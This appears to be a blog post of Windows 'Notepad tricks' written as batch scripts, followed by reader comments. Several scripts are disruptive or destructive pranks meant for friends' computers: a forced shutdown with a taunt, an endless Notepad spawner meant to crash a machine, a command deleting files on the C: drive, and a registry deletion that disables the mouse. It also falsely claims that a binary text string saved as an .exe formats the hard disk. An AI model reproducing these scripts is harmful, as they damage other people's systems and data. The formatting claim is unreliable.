These Interesting Notepad Tricks will make you feel like a hacker

Windows Operating system allows you to do more interesting things on your computer you probably didn’t know before. We have shared some articles related to Windows command prompt. You can access many hidden features of windows using CMD. However, you can also make a batch file of CMD commands which can be executed using Notepad. This article contains several Interesting notepad tricks.

Note: Some of the tricks are extremely dangerous, Don’t execute them on your own PC. We are not responsible if anything wrong happens.

Some Interesting Notepad Tricks

1. Create Notepad Virus that Shutdown your Friend Computer with Message

Open Notepad and Type:-

@echo off
Shutdown.exe -s -t 10
cls
msg * I don’t like you MATE!

Save it as “shutdownvirus.bat”.

2. Open 100s of Notepad Tab to Crash a Computer.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as “Unlimitednotepad.bat” and send it to your friends.

3. Make A Personal Log-Book or A Diary

Open Notepad and type:

.LOG (in capital letters)
Save it as “personaldiary.txt”.

When you open the file again you will see the current date and time is inserted automatically after the LOG line. This will happen automatically every time you reopen the notepad file.

4. Test Your Anti-Virus Program effectiveness

Test your antivirus is work or not from type this below code in your notepad.

Copy the code given below in your notepad file:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Save it as “virus.exe” on your computer.

When you save that file in your Computer, you antivirus prompt and say this is working virus. So you know antivirus is working properly on your Window PC Computer.

5. Create Matrix Movie Computer Screen Effects in Your Computer

Open Notepad and Type:

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Save the file name as ”matrix .bat ” in your Computer.

6. Constantly Repeat Notepad Messages

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Let's have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save the file name but with “continue.bat” extension on your computer. When you open this file in your computer, you see message line by line without type anything.

7. Format your Whole Hard Disk from Type Code in Notepad

This is really interesting things for you guys, you can format any Hard Drive from typing below code on the computer.

Open notepad and type the below code in your Computer.

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

Save it as “Format.exe” file giving any name you desire.

That’s It! Now just double click on the file (to open it) and your C: drive will be formatted!
This is just a little binary trick. Be Careful while using it.

8. Write Simple Undetectable Virus

@Echo off
Del C:\ *.* |y

And save that as bomb.bat in your Computer.

Warning: Never run this file on your Computer, because this file deletes your entire system C: Drive.

9. Disable the Mouse Controls in Computer

rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Never try this trick in your Computer, because this trick disables your mouse.

9 thoughts on “These Interesting Notepad Tricks will make you feel like a hacker”

  1. How can i enable the mouse after disenabling it
    And after sending the mssg to shut a friend’s system, what should be done to revive the system?

    Reply
    • Nice question………and Please guys let us create a SOCIAL MEDIA GROUP on WHATSAPP to share more ideas and Learn from each other. Interesting people should Whatsapp me on +233245878767 ThaNK Guys……

      Reply

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.